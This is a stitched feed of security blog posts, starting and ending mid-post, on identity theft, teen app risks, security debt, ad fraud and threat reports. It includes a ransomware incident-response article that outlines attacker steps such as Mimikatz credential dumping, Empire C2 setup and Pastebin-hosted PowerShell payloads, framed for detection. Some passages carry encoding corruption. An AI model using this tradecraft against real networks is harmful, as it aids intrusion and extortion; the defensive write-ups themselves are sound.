  • Secure your files. Get a fire-proof safe to store sensitive documents including credit cards you hardly use.
  • Keep an eye on your bank and credit card statements. Look for questionable activity.
  • Be careful when using ATMs. When you insert your ATM card into a compromised machine or run your credit card through a phony card reader, you could become a victim of skimming. Skimming is where a hacker illegally obtains information from the magnetic strip on the back of your credit or ATM card. This information can then be used to access your accounts or produce a fake credit card with your name and details on it.

How do I know if my identity has been stolen?

This list is not comprehensive but gives you a good idea on what to look out for.

  • You receive a bill for a credit card account that, though in your name, is not yours. This probably means a thief opened the account in your name.
  • You’re no longer receiving your usual snail mail or email statements. Contact the issuer to find out why.
  • Unfamiliar purchases on your credit card, even tiny ones (crooks often start out with small purchases, and then escalate). Challenge even a $4 purchase.
  • You receive a credit card or store card without having applied for one. If this happens, immediately contact the company.
  • Your credit report has suspicious information, like inquiries for credit that you didn’t make.
  • Collectors are calling you to collect payments you owe, but you owe nothing.
  • Your credit score is high (last time you checked), but you were denied credit for a loan or new credit card. A thief can easily ruin a credit rating.

If my identity is stolen, what should I do?

Finding out that your identity has been stolen can be stressful. First, take a deep breath then follow these initial steps.

  • Contact your local or national law enforcement agency. File a report that your identity has been stolen.
  • Call your bank and credit card companies. Notify them of fraudulent activity. They may be able to reimburse you for any money lost or close any unauthorized accounts.
  • Check with credit reference agencies.  You’re entitled to one free copy of your credit report every 12 months from each of the three nationwide credit reporting companies.  You can check to see if anyone has tried to get credit using your name.
  • Keep records. Keep track of all conversations and paperwork, the more detailed the better. Organize your data into one centralized place. This can be used as evidence for your case and can help you resolve the mess that identity theft can create.

To learn more about how you can protect yourself from identity theft, check out the McAfee Facebook page or follow @McAfee_Home on Twitter.

 

The post Frequently Asked Questions About Identity Theft appeared first on McAfee Blogs.

TikTok Challenge, Hoop App, and Other Headlines You May Have Missed

TikTok Challenge

Digital news that affects families seems to be dominating the headlines these days. To keep parents in the know, here are some of the stories you may want to give extra family discussion time to this week.

Skull Breaker Challenge Proving Unfunny 

Apps — video apps especially — can help kids tap into their creativity and give kids a critical way to connect. Where the fun can take a dangerous turn is in the way kids choose to use their technology. In this case, the poor choice is in the Skull Breaker Challenge (also called the Trip Jump Challenge), a prank resulting in some kids being hospitalized.

The prank, designed to get laughs and accumulate TikTok views, includes two kids tricking a third friend into making a dance video together. Three kids line up side by side for a planned group dance that will be videotaped and posted. As everyone jumps as planned, the two kids on either side swipe the legs out from under the middle person causing him or her to fall backward. According to reports, the prank is surfacing mainly on TikTok but also Youtube.

Safe Family Tip: Consider talking to your child about the dangers of online challenges and the risks already reported in the news. 1) Discuss the physical dangers doctors are warning the public about, including neck strain, concussion, skull fracture, long-term complications, or even death. 2) Using current news stories, explain personal responsibility and what can happen legally if your child hurts another person during a prank.

Snapchat’s Hoop App Being Called ‘Tinder for Teens’

Snapchat users (over 2.5 million in fact) are flocking to a new Tinder-like app called Hoop that interfaces with Snapchat. The developer app allows other Hoop users to swipe through other Hoop users and request to connect via their Snapchat profile name.

While the app asks a user’s age, much like other social sites, there’s no way to prove a user’s age. And, users can change their age at any time after creating an account. This type of app format can be tempting for kids who are naturally curious and seeking to meet new friends outside of their familiar social circle. There’s a potential for common issues such as catfishing, predator behavior, and inappropriate content. Kids as young as 12 can form connections with strangers. While their profile may be harmless, they can’t control the type of content that pops up on their screen from other users. Another red flag: Hoop users are rewarded with “diamonds” for sharing their Snapchat name and getting others to join Hoop, so the incentive to daily share and connect with a wide circle outside of one’s known friend group may prove tough for some kids to resist.TikTok Challenge

Safe Family Tip: While it’s challenging to stay on top of the constant array of new apps, it’s not impossible. One way to understand where your child spends his or her time online is with comprehensive monitoring software. Another way of monitoring activity is to physically check your child’s phone once a week for new app icons (see right) and take the time to talk about his or her favorite apps. Consider explaining the dangers of connecting with strangers and the real possibility that a new “cute 16-year-old” may be a predator attempting to win your child’s trust (it happens every day). Review and agree on which apps are considered safe and the expectations you have for your family’s online choices.

Another app to keep on your radar is Wink. Nearly identical to Hoop, Wink interfaces with Snapchat and is being promoted as a “new friend finder.” It has a similar “swipe” feature that connects kids to random Wink users and is currently ranked #15 in the app store.

Should phones be banned from schools?

A conversation gaining a quiet but consistent buzz is the merit of prohibiting phones from schools — a law France has enforced for two years that has parents, educators, and legislators talking. Several recent studies reveal that phone bans can lead to higher test scores, higher test grades and attention spans, and increased cognitive capacity. Some schools in the U.S. have independently taken steps to curb and ban phones in hopes of focusing on distracted students.

Proponents of phones in school say a ban would be impossible to enforce and that technology is needed to help parents stay in touch with kids during the school day, especially for emergencies. Others say phones at school are a critical part of learning and raising self-sufficient, tech-savvy students prepared for a digital workforce.

Safe Family Tip: Begin the discussion with your child about the pros and cons of devices at school. Listen closely to his or her perspective. Discuss potential device-related issues that can be amplified during the school day such as cyberbullying, group chat conflicts, sexting, gaming during class, and using devices to cheat. Review expectations such as using phones only before and after school to connect with parents.

Stay tuned in the weeks to come as we take a closer look at other apps such as TikTok and WhatsApp Messenger that — when used unwisely — can lead to some surprising risks for kids. Until then, keep the digital safety conversation humming in your home. You’ve got this, parents!

The post TikTok Challenge, Hoop App, and Other Headlines You May Have Missed appeared first on McAfee Blogs.

The ONE Question NO ONE knows the Answer to at RSA Conference 2020

Hello,

On Monday, the RSA Conference 2020 will begin, where almost a thousand cyber security companies will showcase their greatest cyber security solutions to thousands of attendees, and where supposedly "The World Talks Security!"

If that's the case, let's talk security -  I'd like to ask the entire RSA Conference just 1 simple cyber security question -

Question: Do the companies whose CISOs and cyber security personnel are attending the RSA Conference '20 have any idea exactly who has what privileged access in their foundational Active Directory deployments today?


If they don't, then perhaps instead of making the time to attend cyber security conferences, they should first focus on making this paramount determination, because without it, not ONE thing, let alone their entire organization, can be adequately secured.



Unequivocal Clarity

If this one simple question posed above isn't clear, here are 5 simple specific cyber security 101 questions to help gain clarity:

    Does our organization know exactly -
  • Q 1.  Who can run Mimikatz DCSync against our Active Directory to instantly compromise everyone's credentials?
  • Q 2.  Who can change the Domain Admins group's membership to instantly gain privileged access company wide?
  • Q 3.  Who can reset passwords of /disable use of Smartcards on all Domain Admin equivalent privileged accounts?
  • Q 4.  Who can link a malicious GPO to an(y) OU in Active Directory to instantly unleash ransomware system-wide?
  • Q 5.  Who can change or control who has what privileged access in our Active Directory?

If an organization does not have exact answers to these 5 simple questions today, it has absolutely no idea as to exactly who has what privileged access in its foundational Active Directory, and thus, it has absolutely no control over cyber security.




This is Paramount

If you don't think that having exact answers to these questions is paramount, then you don't know a thing about cyber security.


Just ask the world famous and globally trusted $10 Billion cyber security company CrowdStrike, and here's a quote from them - "A secure Active Directory environment can mitigate most attacks."




Zero out of 1000

There are almost 1000 cyber security companies exhibiting at the RSA Conference 2020, but guess how many of those 1000 companies could help you accurately determine the answers to 5 simple questions asked above? The answer is 0.


Not Microsoft, not EMC, not CrowdStrike, not FireEye, not Cisco, not IBM, not Symantec, not McAfee, not Palantir, not Tanium, not CyberArk, not Centrify, not Quest, not ZScaler, not BeyondTrust, not Thycotic, not Varonis, not Netwrix, not even HP, in fact no company exhibiting at RSA Conference 2020 has any solution that could help accurately answer these simple questions.

That's right - not a single cyber security company in the world (barring one), let alone the entirety of all cyber security companies exhibiting at or sponsoring the RSA Conference 2020 can help organizations accurately answer these simple questions.




The Key

The key to being able to answer the leading question above, as well as the five simple cyber security questions posed above lies in having just 1 simple, fundamental cyber security capability - Active Directory Effective Permissions.


There's only 1 company on planet Earth that possesses this key, and its not going to be at the RSA Conference 2020 - this one.



Thanks,
Sanjay.

What Our Data Reveals About Security Debt

It???s a habitual practice we learn from an early age; keeping track of loans and credit card bills reduces overall debt and makes it easier to bring debt down quickly, avoiding those pesky spikes in interest. That very same practice applies to software security testing. Software is tested, vulnerabilities are revealed, and unaddressed vulnerabilities build up over time as interest in the form of extra work, which compounds into security debt that???s increasingly difficult to reduce the longer you wait.

Often, the solution is reprioritizing flaws and improving fix rates to reduce liability over time. In our 10th annual State of Software Security (SOSS X) report, we discuss how some of our findings from over 85,000 application scans correlate with mounting security debt???and why you should pay attention.

Debt dwindles with frequent scanning

Just as making consistent payments on your credit card reduces debt over time, a frequent scanning cadence can lower the amount of debt your organization carries. When surveying the findings in our SOSS X report, we saw that frequent scanners (300+) have 5x less debt than infrequent scanners and they see a 3x reduction in median time to remediation (MedianTTR), or the amount of time it takes to fix flaws.

Scanning Cadence

Misaligned remediation priorities add to interest

In SOSS X, we talk about how some developers operate on LIFO (Last In, First Out) or FIFO (First In, First Out) methods for fixing flaws. Standard remediation procedures are not one size fits all???what works for your organization may not work for another. But the data we studied shows the likelihood of a flaw being fixed in the first month is only about 22 percent. That number drops down to 10 percent for the second month and 3 to 5 percent as time goes on.

Remediation Time

It???s clear from this data that developers are prioritizing the most recently found flaws above all else. The problem with this process is that it doesn???t take into account what is actually increasing risk. Ultimately, an older Cross-Site Scripting vulnerability is just as dangerous as a more recently discovered one. However, this chart sheds light on the relationship between scanning cadence and security debt; if we???re paying more attention to recently discovered flaws, frequent scanning means additional newer flaws to address. Boosting your scanning cadence and sitting down as a team to figure out your approach to prioritizing flaws can help set you on the right path.ツ?

Some industries are more prone to debt than others

Security debt doesn???t discriminate. It shows up in every industry, though some are more likely to accrue debt than others depending on how they prioritize fixes over time, as previously discussed. Data from SOSS X shows us that the Manufacturing and Government/Education industries carry more debt on average than other prominent industries.

Security Debt by Industry

What???s most important to note, though, are the trends over time. For example, we can see that around month four, organizations in Government and Education have an uptick in average fix rates. While Retail doesn???t carry much debt overall, companies tend to remediate the bulk of their flaws by month six or seven and contribute to debt reduction. ツ?

Security needs vary (capturing quick payment information versus storing robust patient histories and treatment plans, for example), but data from your specific industry will help you keep a pulse on average fix rates for security debt. You and your team can then review this data on a consistent basis when creating long-term plans for eliminating flaws.

PHP and C++ build up debt the fastest

Your plans for fixing flaws and reducing debt should factor in the languages you???re using. Why? The average security debt for PHP and C++ is huge and tends to grow over time, especially when compared to .NET, Android, Java, Android, and JavaScript.

Language Flaw Debt

Issues with these two languages are the results of simplicity and age: PHP is suited for beginners and is thus susceptible to insecure coding, while C++ is a powerful language that requires some hands-on management of memory and stack control ??? vulnerabilities that are easier to introduce in C++ than in more common languages.

It???s difficult for most teams to change the language they???re using at work, but it???s important to keep in mind which languages easily add to security debt. Carrying this awareness and understanding changes in language trends will help you prepare efficient security processes throughout your career.

Cross-Site Scripting carries the heaviest liability for debt

When we look at the layers of flaw percentage by application age, it???s apparent that Cross-Site Scripting (A7-XSS) carries the largest amount of debt across applications. There???s also a slight rise in percentage as we inch closer to the 7-month mark, which tells us that XSS (among others) is a notable contributor to security debt.

Cross-site Scripting

XSS attacks occur when a malicious script is injected into a webpage and it alters the way that page behaves, opening the site up to damaging security holes open to unwanted activity, like bypassing authentication or stealing sensitive information. This prominent flaw is not picky when it comes to language, either, with notable findings in .NET, iOS, Java, JavaScript, PHP, and Python. Spanning languages with prevalence and risk, XSS is one to keep an eye on as you work towards reducing your security debt.

Read the full SOSS X report

Want more info? Check out ourツ?SOSS X pageツ?for the full report andツ?additional data to absorb as we head into 2020. You can also listen to our podcast series with IDG, in which three of the episodes dig into security debt to drill down on different industries, why security debt grows deeper, and what's behind the buildup of unfixed flaws.ツ?

ツ?

Disruptive ads enforcement and our new approach


As part of our ongoing efforts — along with help from newly developed technologies — today we’re announcing nearly 600 apps have been removed from the Google Play Store and banned from our ad monetization platforms, Google AdMob and Google Ad Manager, for violating our disruptive ads policy and disallowed interstitial policy.
Mobile ad fraud is an industry-wide challenge that can appear in many different forms with a variety of methods, and it has the potential to harm users, advertisers and publishers. At Google, we have dedicated teams focused on detecting and stopping malicious developers that attempt to defraud the mobile ecosystem. As part of these efforts we take action against those who create seemingly innocuous apps, but which actually violate our ads policies.
We define disruptive ads as ads that are displayed to users in unexpected ways, including impairing or interfering with the usability of device functions. While they can occur in-app, one form of disruptive ads we’ve seen on the rise is something we call out-of-context ads, which is when malicious developers serve ads on a mobile device when the user is not actually active in their app.
This is an invasive maneuver that results in poor user experiences that often disrupt key device functions and this approach can lead to unintentional ad clicks that waste advertiser spend. For example, imagine being unexpectedly served a full-screen ad when you attempt to make a phone call, unlock your phone, or while using your favorite map app’s turn-by-turn navigation.
Malicious developers continue to become more savvy in deploying and masking disruptive ads, but we’ve developed new technologies of our own to protect against this behavior. We recently developed an innovative machine-learning based approach to detect when apps show out-of-context ads, which led to the enforcement we’re announcing today.
As we move forward, we will continue to invest in new technologies to detect and prevent emerging threats that can generate invalid traffic, including disruptive ads, and to find more ways to adapt and evolve our platform and ecosystem policies to ensure that users and advertisers are protected from bad behavior.

CSI: Evidence Indicators for Targeted Ransomware Attacks – Part II

In our first article we discussed the growing pattern of targeted ransomware attacks where the first infection stage is often an info-stealer kind of malware used to gain credentials/access to determine if the target would be valuable for a ransomware attack. In this second part we will pick up where we left off: the attacker has a foothold on the network by controlling an infected host or has a valid account to access a remote service.

Figure 1 Adversary has a beachhead

With either a valid account or having access towards a system in a company, the first two things you want to figure out are:

  1. What kind of rights do I have from this machine?
  2. Where the heck am I in this network?

One of the first commands you would observe as a responder is “whoami/all”. The output of this command will give the details of the account the attacker has on the machine with regards to group/privileges. A great way to detect suspicious activity in your network is to setup a detection rule for the “whoami” command and assign it to the assets in use by executives or holders of key positions in the company. There might always be a techie executive in the company but most of them will never use command or use a command-line.

In the context of the targeted ransomware attacks, the attacker preferably wants to have local-admin/domain-admin and or system rights. Those will be the keys to the kingdom and open all gates.

In the next step, mostly observe some variant from Mimikatz or other password-dumping tools that will dump the credentials from a machine. Either the tool Mimikatz is compiled in various formats or it is part of a remote PowerShell toolkit like Empire:

Figure 2 Empire Mimikatz (source powershellempire.com)

We began this article series with the fact that every touch of a system will leave digital footprints behind, in this example with Empire, the following is happening:

  • Attacker has a connection to a system through usage of a ‘launch script’
  • Attacker is using a C2 (command and control) to interact
  • Attacker is using PowerShell to execute commands

From a MITRE ATT&CK Techniques perspective we would look at this overview of techniques and interaction:

Figure 3 Attacker using Empire

Which stages and evidence sources will create visibility and early warning indicators?

For PowerShell usage there are several digital evidence locations available. Besides traces in memory, there can be traces discovered in the Windows Event logs, the Registry, on the file-system like the Prefetch directory and there’s even a PowerShell command history file available if a version of PowerShell v5 and above is used. That location can be found at:

C:\Users\<username>\AppData\Roaming\Microsoft\Windows PowerShell\PSReadline\ConsoleHost_history.txt 

Empire by design is encrypting its communications, makes infrequent and randomized connections and, last but not least, is mirroring HTTP activity to stay hidden in the ‘normal’ traffic. If we look at the order of volatility from our first article, network traffic will change from seconds to minutes, giving us a very short window unless we do full packet capture and inspection of our network traffic.

The network activity might be challenging to notice, however there are possible indicators that can help possible Empire traffic. To setup the C2 traffic, the attacker needs to configure a ‘listener’ that contains all the settings for the C2 traffic interaction.

Figure 4 Empire Listener setup

In the partial setup screen in Figure 4, we see three URI’s being configured that will be frequently requested and combined with an HTTP Header. A combination detection of the three URI’s polled within x timeframe combined with the HTTP header could be a very good network-indicator to detect Empire C2 traffic. As a responder, when you detect these indicators, look back at Figure 3 and start hunting backwards. You discovered the C2 activity, but it means the hosts who are interacting with the C2 have PowerShell activity and time to secure your evidence. This is how I like to apply the MITRE ATT&CK model:  understand what you just discovered, and the implications  then hunt for evidence or anticipate the attacker’s next step and act.

Keep in mind this is a default setup and can be changed by the attacker. Experience suggests that cyber-crime motivated actors are in a hurry for the cash and use a default installation of tools, whereas nation-state cyber-espionage operations are customizing since they want to operate longer in a victim’s network.

Now back to our scenario. The attacker has acquired the right privileges and has laterally moved through the network to have an idea how large it is and have possibly identified critical assets — they love shared folders with a lot of data in them.

The attacker will next prepare a custom version of the ransomware and could have tested it on underground AV-testing services to make sure that it will be fully undetectable (FUD). Depending on skills and capabilities, the ransomware will either be uploaded to the victim’s network or using scripts distributed and executed over the network. We have observed cases where a series of .bat scripts were used and where the payload was downloaded from Pastebin and executed by PowerShell on hosts – enough variety and options. Once executed,  the first calls will come into the Helpdesk reporting the ransom notes.

A lot of the above techniques are available within post exploitation frameworks, of which there are several options that attackers can choose from. With any of these, the tool is only a conduit and we should always focus on detecting techniques rather than implementation specifics. Available options come in the form of both underground toolkits and penetration test tools designed to build awareness around the attacks. Unfortunately, those designed as security tools may also be used for nefarious purposes. This ‘chicken and egg’ situation is often the cause of heated debate since on one hand the tools can streamline attack scenarios, while on the other, without having them available to defenders, adequate testing of precautions is impossible.

Empire was mentioned above. This excellent PowerShell-based post-exploitation framework is no longer maintained or supported by its authors. Although forks exist, traction has slowed but its use is still detected. Cobalt Strike, a commercial adversary simulation platform regularly used by red teams to test infrastructural security measures and detection capacity, is increasingly being adopted by criminal actors.” Although its license is strictly controlled, pirated and cracked trial versions are available in the criminal underworld. Cobalt Strike is updated regularly to include the latest techniques and tools such as Mimikatz, while allowing a lot of flexibility for addition of new and unique attack and bypass techniques. This can increase the likelihood of success, even on the most recent operating system versions.

Threat groups distributing GoGalocker, MegaCortex and Maze ransomware have been observed utilizing Cobalt Strike. At this stage in our scenario, with a foothold on the network, Cobalt Strike provides many options which can be used to complete their objective. These include T1075 Pass the Hash, T1097 Pass the Ticket, T1105 Remote File Copy, T1021 Remote Services and the old reliable: T1077 Windows Admin Shares.

As detailed in part 1, this evidence remains on a system for differing time spans. By studying previous attacks, we can see a general mode of operation and a sequence in which these techniques are executed. This can help guide us when choosing the timing and methods of evidence collection.

Detection of these attacks is not an easy task. Exploitation frameworks are often open source, in which case the attacker can modify code to manipulate IOC’s (indicators of compromise). Alternatively, and as is the case for our example, Cobalt Strike, the framework will provide specific configuration around the final form of binary droppers, network traffic format, timing and specific parameters, etc. Therefore, generic signatures will only detect the most basic of attacks and, as previously mentioned, focusing on techniques and behaviors rather than tools becomes critical. Creating a Cobalt Strike generic detection may miss the point of its existence – education around malicious techniques and behaviors. However, we can learn a lot about various indicator categories that can be monitored for functional outliers and unusual behaviors and, where the tool is merged into malware strains, the markers for that specific instance can often become specific IOC’s.

In a lot of cases, understanding normal system behavior is crucial for uncovering outliers and having a baseline system for comparison can aid the analysis.

A few examples of these include:

  • Memory
    • The holy grail. Binary droppers may be modified to mask their true intentions, however in memory they can be visible in a decoded format.
    • Search for markers of functionality such as suspicious system calls or reads/writes of sensitive system locations (e.g. lsass memory).
  • Running Processes
    • Similarly, running processes can be very revealing.
    • Although process ‘migration’ is often carried out, review for abnormal process hierarchies.
    • Does the process carry out functionality that is not expected? E.g. does notepad make http requests to an external domain?
  • Network Traffic
    • Domains should match known-good.
    • Spikes or regular timing patterns in traffic type or to specific servers.
    • Variables used in unusual manner, e.g. http headers including encoded binary data.
  • Disk
    • Binary and configuration files available for reverse engineering.
    • This static analysis is not as powerful as dynamic, running software.
    • Debugging a malicious binary may help but beware of sandbox/debugger detection.
  • Backup / Log Files
    • Never fully trust log files as attackers can easily falsify. External sources, e.g. syslog going to an external db, can improve the reliability of log data if available.
    • Search for specific markers for malicious activity. Some useful items to include: command line logs, PowerShell script block logging, specific logs for network applications such as web servers, service installation, share accessed – particularly C$, process launch, account login.

As we highlighted in the two articles, targeted ransomware attacks have increased massively over the past 8 months. Targeting MSPs to hit many at the same time, victims running critical operations, public services, etc. Many of them are all using a similar blueprint as we tried to highlight.

Learn from the articles, identify which technology can give you that visibility, what digital evidence sources do you have, and can you detect fast enough to preserve and respond? If the ‘initial access stage’ is passed, where can you pick up in your line of defense and stop the threat?

Stay tuned for part 3, where we discuss technical controls that are available to help your organization to react to these early warning signs within an acceptable timeframe.

The post CSI: Evidence Indicators for Targeted Ransomware Attacks – Part II appeared first on McAfee Blogs.

Stay Sharp and Squash Security Debt with Veracode’s Security Labs

???Tell me and I forget. Teach me and I remember. Involve me and I learn.??? This renowned quote from Benjamin Franklin is a powerful mantra for refining skills in any craft, coding included.

When it comes to developer training, nothing beats hands-on experience with real code customizable to the way a business runs. That???s why we???re excited to announce our new online training platform, Veracode Security Labs, crafted for developers and organizations eager to learn best practices in modern application security, deliver code on time, and reduce security debt. Whether developers lack the time for training or simply want to stay sharp, Security Labs empowers them to learn and grow backed by application security.

It isn???t a simulated experience; developers can log into the program to access a real application in a contained environment. From there, they learn how to exploit that application and practice fixing vulnerabilities with exercises on modern web applications, in their preferred languages, for a tailored and comprehensive hands-on training that helps them establish best practices. Ben Franklin would be proud.

Fast and effective learning

When a breach hits, employees can find themselves in a mad dash to patch security holes and remediate damage. Being prepared is all about incorporating security-minded processes earlier in the development cycle to avoid such headaches down the road. The interactive Security Labs experience ensures developers leave the training module ready to hit the ground running with fresh new skills that help them not only fix flaws quickly, but also write better code. ツ?

???The future of AppSec depends on enabling developers to create more secure code from the start,??? says Fletcher Heisler, Veracode???s Director of Developer Enablement and one of the minds behind Security Labs. Using Security Labs to directly exploit and patch real code means developers can begin improving in just 10 minutes.

???Through this hands-on practice, developers gain practical AppSec skills that can be applied immediately,??? Fletcher explains. ???For Veracode customers, this means more secure code, less time spent on security debt, and developers who are overall more engaged in supporting security.???

Through progress reporting, email assignments, and a leaderboard, teams of developers feel inspired by each other to advance their secure coding skillsets. Managers can set required modules and deadlines too, with tools for tracking team completion and exporting progress reports so that they have results in hand to prove capability and compliance.

Best practices and beyond

Veracode Security Labs isn???t solely about preparing developers to tackle vulnerabilities and stay on top of compliance. At its core, this training platform bridges the gap between development and security to empower organizations with the tools they need to keep AppSec at the forefront of their operations. And with the average cost per data breach incident hitting 3.29 million in 2019, staying sharp can save money and bandwidth in the long run.

???It???s so much more costly, in terms of both dollars and time, to fix a security flaw once it has already made its way into production code,??? says Fletcher. ???Meanwhile, security teams can???t scale to the time and expertise required to review every line of code from every developer. If developers have the foundational training to write secure code from the very start, an organization will be able to deliver ??? andツ?continueツ?to deliver ??? applications and features on time without getting bogged down in security debt.???

Practical lessons from this hands-on program can help an organization from the ground up. And when paired with Veracode???s Static Analysis IDE Scan solution to quickly identify and remediate flaws at scale, development teams have every opportunity for risk reduction at their fingertips.

Interested in trying it out? You can find more information about Security Labs here, and request a demoツ?to see how this solution can benefit your organization.

M-Trends 2020: Insights From the Front Lines

Today we release M-Trends 2020, the 11th edition of our popular annual FireEye Mandiant report. This latest M-Trends contains all of the statistics, trends, case studies and hardening recommendations that readers have come to expect through the years—and more.

One of the most exciting takeaways from this year’s report: the global median dwell time is now 56 days. That means the average attacker is going undetected on a network for under two months—an M-Trends first. This is a very promising statistic that demonstrates how far we’ve come since 2011 when the global median dwell time was 416 days. And yet, we know a sophisticated attacker needs only a few days to gain access to the crown jewels, so there is still plenty of room for improvement.

Another interesting statistic in the report is what we refer to as "detection by source." For the first time since 2015, the majority of organizations are being notified of compromises by external sources (53 percent) over internal teams (47 percent). This is more likely due to factors such as increases in law enforcement notifications and compliance changes, and less likely due to internal teams having lost a step.

There’s a whole lot more to look forward to in M-Trends 2020, including:

  • By the Numbers: Global median dwell time and detection by source are just the tip of the iceberg—we share a number of other statistics related to targeted industries, malware, threat techniques and more.
  • Newly Named APT Groups: Learn all about APT41, group responsible for carrying out Chinese state-sponsored espionage and financially motivated activity since as far back as 2012.
  • Trends: We take a deep dive into the latest trends involving malware families, monetizing ransomware, crimeware as a service, and malicious insiders.
  • Case Studies: With so many organizations moving to the cloud, we take a look at a breach involving cloud assets. We also take readers through a campaign where attackers were targeting gift cards.

While M-Trends 2020 contains plenty of new information, the goal of M-Trends has remained the same since the beginning: to arm security professionals with details on the latest attacks and threats we are seeing during our engagements.

Download the 11th edition of M-Trends today.

NICE Webinar: The Intersection of the Privacy and Cybersecurity Workforce

The PowerPoint slides used during this webinar can be downloaded here. Speakers: Katie Boeckl Privacy Risk Strategist, National Institute of Standards and Technology (NIST) Caitlin Fennessy Research Director, International Association of Privacy Professionals Jonathan Fox Director, Privacy Engineering Chief Privacy Office, Cisco Synopsis: With the rise of a more digitally connected society, the intersection between privacy and cybersecurity grows closer. The NICE Cybersecurity Workforce Framework includes a few components covering privacy, including a work role for Privacy Officer/Privacy

The Missing LNK — Correlating User Search LNK files

Forensic investigators use LNK shortcut files to recover metadata about recently accessed files, including files deleted after the time of access. In a recent investigation, FireEye Mandiant encountered LNK files that indicated an attacker accessed files included in Windows Explorer search results. In our experience, this was a new combination of forensic artifacts. We’re excited to share our findings because they help to paint a more complete picture of an attacker’s actions and objectives on targeted systems. Further, these findings can also be leveraged for insider threat cases to determine the path used to locate and subsequently open a file.

Windows LNK Format

The .lnk extension is associated with a class of files known as Shell Items. These binary format files contain information that can be used to access other data objects in the Windows shell (the graphical user interface).

LNK shortcut files are one type of Shell Item. They are created by the Windows operating system automatically when a user accesses a file from a supported application but can also be created by the user manually. LNK shortcut files typically contain metadata about the accessed file, including the file name and size, the original path, timestamps, volume and system information (ex. drive type and system hostname), and network information (ex. network share path). Fortunately, there are tools available that can parse these files. While internally at Mandiant we leverage FireEye Endpoint Security to parse LNK files and identify suspicious user search terms, for the purposes of this blog post we will be using LECmd by Eric Zimmerman. Figure 1 shows the command line options for LECmd.exe.


Figure 1: LECmd.exe command line options

Parsed metadata within LNK shortcut files is relevant to forensic investigations for multiple use cases, including profiling user activity on a system or searching for references to malware that has since been deleted.

User Search LNK files

Recently, Mandiant encountered LNK files whose format we did not initially recognize. The files came from a Windows Server 2012 R2 system and had paths like those shown in Figure 2. We guessed that they were LNK shortcut files based on their extension and file path; however, their content was not familiar to us.

C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\passw.lnk

C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\gov.lnk

Figure 2: Full file path of the unfamiliar LNK files

In the previous examples, a forensic investigator would use the LNK shortcut filename to conclude that a user opened a file named passw or gov. Then, they would use a tool like LECmd to recover additional metadata. This would provide them with the full file path of the accessed file and the timestamps of the file at the time it was accessed - among other forensic information.

However, the previous LNK files did not reveal expected metadata. Figure 3 shows the output of LECmd for passw.lnk (some information omitted for clarity).

LECmd version 1.3.2.1

Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/LECmd

--- Header ---
  Target created:
  Target modified:
  Target accessed:

  File size: 0
  Flags: HasTargetIdList, IsUnicode, DisableKnownFolderTracking
  File attributes: 0
  Icon index: 0
  Show window: SwNormal (Activates and displays the window. The window is restored to its original size and position if the window is minimized or maximized.)

--- Target ID information (Format: Type ==> Value) ---

  Absolute path: Search Folder\passw

  -Users property view ==> Search Folder
  >> Property store (Format: GUID\ID Description ==> Value)
     d5cdd505-2e9c-101b-9397-08002b2cf9ae\AutoList  ==> VT_STREAM not implemented (yet) See extension block section for contents for now
     d5cdd505-2e9c-101b-9397-08002b2cf9ae\AutolistCacheTime  ==> 1849138729510
     d5cdd505-2e9c-101b-9397-08002b2cf9ae\AutolistCacheKey  ==> Search Results in Local Disk (C:)0

  -Variable: Users property view ==> passw
  >> Property store (Format: GUID\ID Description ==> Value)
     1e3ee840-bc2b-476c-8237-2acd1a839b22\2      (Description not available)         ==> VT_STREAM not implemented
     1e3ee840-bc2b-476c-8237-2acd1a839b22\8      (Description not available)         ==> passw
     28636aa6-953d-11d2-b5d6-00c04fd918d0\11     Item Type                           ==> Stack
     28636aa6-953d-11d2-b5d6-00c04fd918d0\25     SFGAO Flags                         ==> 805306372
     b725f130-47ef-101a-a5f1-02608c9eebac\10     Item Name Display                   ==> passw

--- End Target ID information ---

--- Extra blocks information ---

>> Property store data block (Format: GUID\ID Description ==> Value)
   (Property store is empty)

Figure 3: LECmd.exe output for passw.lnk

Of note, none of the expected information for LNK shortcut files is present. However, there were strings of interest in the Target ID Information section including Search Folder\passw as well as Search Results in Local Disk (C:). For comparison, Figure 4 highlights output for a standard LNK shortcut file using a test file. Notice that the target file timestamps, file size, full file path, and other expected file metadata are present (some information omitted for clarity).

LECmd version 1.3.2.1

Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/LECmd

--- Header ---
  Target created:  2020-01-21 19:34:28
  Target modified: 2020-01-21 19:34:28
  Target accessed: 2020-01-22 21:25:12

  File size: 4
  Flags: HasTargetIdList, HasLinkInfo, HasRelativePath, HasWorkingDir, IsUnicode, DisableKnownFolderTracking
  File attributes: FileAttributeArchive
  Icon index: 0
  Show window: SwNormal (Activates and displays the window. The window is restored to its original size and position if the window is minimized or maximized.)

Relative Path: ..\..\..\..\..\Desktop\test.txt
Working Directory: C:\Users\<username>\Desktop

--- Link information ---
Flags: VolumeIdAndLocalBasePath

>>Volume information
  Drive type: Fixed storage media (Hard drive)
  Serial number: <serial number>
  Label: OSDisk
  Local path: C:\Users\<username>\Desktop\test.txt

--- Target ID information (Format: Type ==> Value) ---
  Absolute path: My Computer\Desktop\test.txt

  -Root folder: GUID ==> My Computer

  -Root folder: GUID ==> Desktop

  -File ==> test.txt
    Short name: test.txt
    Modified: 2020-01-21 19:34:30
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: test.txt
    Created: 2020-01-21 19:34:30
    Last access: 2020-01-21 19:34:32
    MFT entry/sequence #: 108919/8 (0x1A977/0x8)

--- End Target ID information ---

--- Extra blocks information ---

>> Tracker database block
   Machine ID: <hostname>
   MAC Address: <mac address>
   MAC Vendor: INTEL
   Creation: 2020-01-21 15:19:59

   Volume Droid: <volume>
   Volume Droid Birth: <volume>
   File Droid: <file>
   File Droid birth: <file>

Figure 4: LECmd.exe output for standard LNK shortcut file test.txt

Fortunately, during the investigation we also parsed the user’s NTUSER.DAT registry file (using Harlan Carvey’s RegRipper) and reviewed the WorldWheelQuery key which details user Explorer search history. The passw.lnk file suddenly became more interesting! Figure 5 shows the entries parsed from the registry key. Note that the search history includes the same term we observed in the LNK file: passw.

wordwheelquery v.20100330
(NTUSER.DAT) Gets contents of user's WordWheelQuery key

Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery
LastWrite Time Wed Nov 13 06:51:46 2019 (UTC)

 Searches listed in MRUListEx order

14   Secret                         
6    passw                         
13   ccc                           
